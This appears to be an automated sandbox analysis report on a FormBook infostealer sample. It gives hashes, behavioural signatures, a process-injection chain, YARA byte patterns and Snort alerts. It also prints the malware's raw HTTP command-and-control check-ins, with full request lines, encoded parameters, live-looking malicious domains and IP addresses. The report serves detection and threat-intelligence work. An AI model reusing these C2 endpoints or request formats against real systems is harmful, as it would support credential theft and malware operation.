
Windows Analysis Report
nJ8mJTmMf0.exe

Overview

General Information

Sample name: nJ8mJTmMf0.exe (renamed because original name is a hash value)
Original sample name: 8e2c2721d94a488e27b363152a56ea079a7932b41144b71f385d8b37ca70aa2e.exe
Analysis ID: 1466073
MD5: dd560917fd1166f8f9a3ca565e1c3957
SHA1: 07e6f2b8aa9410f9a649353da7ca692b14d4a5c4
SHA256: 8e2c2721d94a488e27b363152a56ea079a7932b41144b71f385d8b37ca70aa2e
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • nJ8mJTmMf0.exe (PID: 7256 cmdline: "C:\Users\user\Desktop\nJ8mJTmMf0.exe" MD5: DD560917FD1166F8F9A3CA565E1C3957)
    • svchost.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\nJ8mJTmMf0.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe (PID: 1364 cmdline: "C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • PresentationHost.exe (PID: 7616 cmdline: "C:\Windows\SysWOW64\PresentationHost.exe" MD5: C6671F8B9F073785FD617661AD1F1C45)
          • firefox.exe (PID: 7764 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches (type: MEMORY):
  • 00000003.00000002.4125575598.00000000082C0000.00000040.80000000.00040000.00000000.sdmp
    Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
    Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown | Strings:
      0x47627:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      0x30d46:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 00000001.00000002.1978005632.0000000003080000.00000040.10000000.00040000.00000000.sdmp
    Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
    Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown | Strings:
      0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      0x140af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 00000006.00000002.4121800336.0000000004A74000.00000004.00000800.00020000.00000000.sdmp
    Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown | Strings:
      0xaf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  (8 entries in the full report; only those listed above are included in this export)

Yara matches (type: UNPACKEDPE):
  • 1.2.svchost.exe.400000.0.unpack
    Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
    Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown | Strings:
      0x2cda3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      0x164c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 1.2.svchost.exe.400000.0.raw.unpack
    Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
    Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown | Strings:
      0x2dba3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      0x172c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\nJ8mJTmMf0.exe", CommandLine: "C:\Users\user\Desktop\nJ8mJTmMf0.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\nJ8mJTmMf0.exe", ParentImage: C:\Users\user\Desktop\nJ8mJTmMf0.exe, ParentProcessId: 7256, ParentProcessName: nJ8mJTmMf0.exe, ProcessCommandLine: "C:\Users\user\Desktop\nJ8mJTmMf0.exe", ProcessId: 7272, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\nJ8mJTmMf0.exe", CommandLine: "C:\Users\user\Desktop\nJ8mJTmMf0.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\nJ8mJTmMf0.exe", ParentImage: C:\Users\user\Desktop\nJ8mJTmMf0.exe, ParentProcessId: 7256, ParentProcessName: nJ8mJTmMf0.exe, ProcessCommandLine: "C:\Users\user\Desktop\nJ8mJTmMf0.exe", ProcessId: 7272, ProcessName: svchost.exe
Snort alerts:
Timestamp                 SID      Source Port  Destination Port  Protocol  Classtype
07/02/24-14:07:01.922969  2855464  49738        80                TCP       A Network Trojan was detected
07/02/24-14:06:46.303031  2855465  49736        80                TCP       A Network Trojan was detected
07/02/24-14:08:39.009481  2855465  49761        80                TCP       A Network Trojan was detected
07/02/24-14:07:17.766594  2855464  49743        80                TCP       A Network Trojan was detected
07/02/24-14:07:36.301715  2855465  49749        80                TCP       A Network Trojan was detected
07/02/24-14:07:55.738870  2855464  49754        80                TCP       A Network Trojan was detected
07/02/24-14:07:44.596745  2855464  49751        80                TCP       A Network Trojan was detected
07/02/24-14:07:49.702879  2855465  49753        80                TCP       A Network Trojan was detected
07/02/24-14:07:15.236401  2855464  49742        80                TCP       A Network Trojan was detected
07/02/24-14:09:00.595741  2855464  49763        80                TCP       A Network Trojan was detected
07/02/24-14:07:28.626581  2855464  49746        80                TCP       A Network Trojan was detected
07/02/24-14:08:31.344522  2855464  49758        80                TCP       A Network Trojan was detected
07/02/24-14:07:22.830857  2855465  49745        80                TCP       A Network Trojan was detected
07/02/24-14:07:59.523620  2855464  49755        80                TCP       A Network Trojan was detected
07/02/24-14:07:42.060544  2855464  49750        80                TCP       A Network Trojan was detected
07/02/24-14:08:33.882411  2855464  49759        80                TCP       A Network Trojan was detected
07/02/24-14:07:31.173075  2855464  49747        80                TCP       A Network Trojan was detected
07/02/24-14:07:01.922969  2856318  49738        80                TCP       A Network Trojan was detected
07/02/24-14:07:09.547482  2855465  49741        80                TCP       A Network Trojan was detected
07/02/24-14:09:06.390818  2855465  49765        80                TCP       A Network Trojan was detected
07/02/24-14:08:04.861584  2855465  49757        80                TCP       A Network Trojan was detected
07/02/24-14:08:58.056879  2855464  49762        80                TCP       A Network Trojan was detected
07/02/24-14:07:04.478292  2855464  49739        80                TCP       A Network Trojan was detected


AV Detection

Source: http://www.adoby.xyz/ghq5/ | Avira URL Cloud: Label: malware
Source: https://www.threendresses.com/ecb1/?wd98XJp=i1LTV2o1IZtmrbvE4asAhp8fTTMl8iuKZlDswLcPFQRrGDQpSYT4T6Qz | Avira URL Cloud: Label: malware
Source: http://www.adoby.xyz/ghq5/?wd98XJp=dNjYg/LNb+Btw7/gHk7XSMyPk/zPSOV1YOlLUnvgSo8eic1H8Ppx0PY9ldg0aj+ffPmEFDEyAFk9JBqMQ/w/NLyeMKaPgOi3ekgmu34KkG/nLXsYy1o9wJg=&2hZdq=H6f4R | Avira URL Cloud: Label: malware
Source: http://www.abc8web.com/sm5e/?wd98XJp=o8xG6LBLqhGEFqfWTr3vbfLymD68CBTmrGDPPbcweY6zCsuE8W4/fbHpwlO8ph1RffMeX91soDhoi1OdGkM065Zd4OviC0ZoCrIQ2N2wQupqguS4lzCfvC0=&2hZdq=H6f4R | Avira URL Cloud: Label: malware
Source: https://www.kosherphonestore.com/y0az/?wd98XJp=1StTTN5BD | Avira URL Cloud: Label: malware
Source: http://www.threendresses.com/ecb1/ | Avira URL Cloud: Label: malware
Source: http://www.threendresses.com/ecb1/?wd98XJp=i1LTV2o1IZtmrbvE4asAhp8fTTMl8iuKZlDswLcPFQRrGDQpSYT4T6Qz9Nxrj1c/x943R5zeBwNAiK6gnAeQLZ/WlxRJaqzCSDsHaoXTEmVBFAAd8oj/2Yo=&2hZdq=H6f4R | Avira URL Cloud: Label: malware
Source: http://www.abc8web.com/sm5e/ | Avira URL Cloud: Label: malware
Source: nJ8mJTmMf0.exe | ReversingLabs: Detection: 57%
Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.4125575598.00000000082C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1978005632.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1977710626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4121057875.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1978344060.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4121859503.00000000045C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: nJ8mJTmMf0.exe | Joe Sandbox ML: detected
Source: nJ8mJTmMf0.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: PresentationHost.pdbGCTL | source: svchost.exe, 00000001.00000003.1940176962.0000000002C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1940110790.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000003.1910341128.000000000160B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4121058852.000000000080E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP | source: nJ8mJTmMf0.exe, 00000000.00000003.1661528296.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, nJ8mJTmMf0.exe, 00000000.00000003.1660936277.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1978035667.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1867131484.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1868917972.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1978035667.000000000339E000.00000040.00001000.00020000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122016791.0000000004EE0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: nJ8mJTmMf0.exe, 00000000.00000003.1661528296.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, nJ8mJTmMf0.exe, 00000000.00000003.1660936277.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1978035667.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1867131484.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1868917972.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1978035667.000000000339E000.00000040.00001000.00020000.00000000.sdmp, PresentationHost.exe, PresentationHost.exe, 00000006.00000002.4122016791.0000000004EE0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationHost.pdb | source: svchost.exe, 00000001.00000003.1940176962.0000000002C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1940110790.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000003.1910341128.000000000160B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000005E8C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.000000000550C000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4121169221.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2315187674.000000001692C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000005E8C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.000000000550C000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4121169221.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2315187674.000000001692C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_00664696 GetFileAttributesW,FindFirstFileW,FindClose | 0_2_00664696
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_0066C93C FindFirstFileW,FindClose | 0_2_0066C93C
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_0066C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf | 0_2_0066C9C7
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_0066F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_0066F200
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_0066F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_0066F35D
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_0066F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_0066F65E
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_00663A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_00663A2B
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_00663D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_00663D4E
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_0066BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_0066BF27
Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 6_2_00B1BDA0 FindFirstFileW,FindNextFileW,FindClose | 6_2_00B1BDA0
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | Code function: 4x nop then pop ebx | 3_2_082E2B35
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | Code function: 4x nop then xor eax, eax | 3_2_082E6467
Source: C:\Windows\SysWOW64\PresentationHost.exe | Code function: 4x nop then xor eax, eax | 6_2_00B097D0

Networking

Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49736 -> 84.32.84.112:80
Source: Traffic | Snort IDS: 2856318 ETPRO TROJAN FormBook CnC Checkin (POST) M4 192.168.2.4:49738 -> 3.33.130.190:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49738 -> 3.33.130.190:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49739 -> 3.33.130.190:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49741 -> 3.33.130.190:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49742 -> 78.111.111.51:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49743 -> 78.111.111.51:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49745 -> 78.111.111.51:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49746 -> 172.67.200.242:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49747 -> 172.67.200.242:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49749 -> 172.67.200.242:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49750 -> 188.114.97.3:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49751 -> 188.114.97.3:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49753 -> 188.114.97.3:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49754 -> 116.213.43.190:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49755 -> 116.213.43.190:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49757 -> 116.213.43.190:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49758 -> 109.95.158.127:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49759 -> 109.95.158.127:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49761 -> 109.95.158.127:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49762 -> 162.0.213.72:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49763 -> 162.0.213.72:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49765 -> 162.0.213.72:80
Source: DNS query: www.adoby.xyz
Source: Joe Sandbox View | IP Address: 162.0.213.72
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: Joe Sandbox View | ASN Name: ASFIBERSUNUCUTR
Source: Joe Sandbox View | ASN Name: ACPCA
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: DHOSTING-ASWarsawPolandPL
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (15 occurrences)
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_006725E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_006725E2
          Source: global trafficHTTP traffic detected: GET /y0az/?wd98XJp=1StTTN5BD+5aXW5ltMxXpzm1HVVSwZLsUdxETJpeMbRSKeJkL8yNVC6cqVCEcPMcPzsub+RoFiososJ7aYXNlWIy6nA9AoQ6GnR0Gmd+weA/r+qlKoAho/M=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.kosherphonestore.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /sm5e/?wd98XJp=o8xG6LBLqhGEFqfWTr3vbfLymD68CBTmrGDPPbcweY6zCsuE8W4/fbHpwlO8ph1RffMeX91soDhoi1OdGkM065Zd4OviC0ZoCrIQ2N2wQupqguS4lzCfvC0=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.abc8web.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /ecb1/?wd98XJp=i1LTV2o1IZtmrbvE4asAhp8fTTMl8iuKZlDswLcPFQRrGDQpSYT4T6Qz9Nxrj1c/x943R5zeBwNAiK6gnAeQLZ/WlxRJaqzCSDsHaoXTEmVBFAAd8oj/2Yo=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.threendresses.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /2nu3/?wd98XJp=kpCfKF0WzJdSazQmt+Slz7YMxCL88Ck3GTDuMNK/H/Z7+vSkhcWJrxIVRHFhCg6b5G6dYsxeFoEulnLMEOj8SMB4wRe40fAIutKuKCnjbT5TVzUJ6OZr4Zg=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.personalcaresale.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /efdt/?wd98XJp=MALnGsSsCxZXAJsklBHSyvV4Cwt+rIU5CjwRGjorv42b71G2YZGZ8sEfFWk4L2DJaggYN2F6bElJhaqiOt+r3C6w5v7JMVR/VQKh9hDc+/lVPZE+6qMMIlI=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.coinwab.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /pqva/?wd98XJp=ZKm3cPRqjLICFiRrATX7oY0MbRIIvi8qgjtP/vsOoinDFUrpWf4t7wcwUBRK5t7Qc0H9b4lf1rTESW8G/Q5oJQ2SGD/5MgBfv+zXfj20S4XoQgB8oyIQXRQ=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.mqmsqkw.lolConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /zgi4/?wd98XJp=Bv8WP0Y6I4L4rkLxeI7P9FySYZNc9GwgDECc8onmv+Up0YCRhWOMiFe4VqushDbL0H+yYl3KgA/w0/Chwa1nzYna+/yL7Br3qSv0RQdnV5Z6V6VBi/tSxM4=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.synergon.spaceConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /ghq5/?wd98XJp=dNjYg/LNb+Btw7/gHk7XSMyPk/zPSOV1YOlLUnvgSo8eic1H8Ppx0PY9ldg0aj+ffPmEFDEyAFk9JBqMQ/w/NLyeMKaPgOi3ekgmu34KkG/nLXsYy1o9wJg=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.adoby.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /uox9/?wd98XJp=SkqqSrQ8SMo2XL3atDg5EwteixjEHmcOkKNOXL2YXVO5YY42DfvwbKSww9pKtEGGvKt0lrGjy49L8DH+d/eZjL5PtpdyGoJABAcliTTSnjNRJ5qgIg1UjKg=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.washio.worldConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
